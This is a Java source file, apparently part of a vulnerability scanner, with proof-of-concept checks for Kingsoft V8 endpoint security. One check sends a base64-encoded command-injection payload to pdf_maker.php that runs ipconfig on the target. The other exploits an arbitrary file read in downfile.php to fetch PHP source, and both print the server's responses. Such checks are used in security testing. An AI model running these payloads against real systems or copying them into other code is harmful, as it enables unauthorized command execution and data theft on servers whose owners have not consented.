package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;

@BasicMapping(uri = "金山V8")
public class JinShanController extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description="金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞" ,SupportVulType= SupportVul.RuntimeExec)
    public void vul_pdf_maker(Poc_Exp type, String target, Object... args) throws Exception {
        WriteLog("\n[*]开始检测：  金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞");

        switch (type){
            case EXP:
                break;
            case POC:
                String data = "url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx";
                HttpRequest httpRequest = new HttpRequest(target+"/inter/pdf_maker.php");
                Response result = httpRequest.Post(data);
                if(result.responseBody.contains("Windows")&&result.statusCode==200){
                    WriteLog(" 存在漏洞");
                    WriteLog(result.responseBody);
                }else {
                    WriteLog(" 不存在漏洞");
                }
        }
    }
    @VulnerabilityDescriptionMapping(Description="金山 V8 终端安全系统 downfile.php 任意文件读取漏洞" ,SupportVulType= SupportVul.信息泄露)
    public void vul_downfile(Poc_Exp type, String target, Object... args) throws Exception {
        WriteLog("\n[*]开始检测：  金山 V8 终端安全系统 downfile.php 任意文件读取漏洞");

        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+"/htmltopdf/downfile.php?filename=downfile.php");
                Response result = httpRequest.Get("");
                if(result.responseBody.contains("<?php")&&result.statusCode==200){
                    WriteLog(" 存在漏洞");
                    WriteLog(result.responseBody);
                }else {
                    WriteLog(" 不存在漏洞");
                }
        }
    }

    }
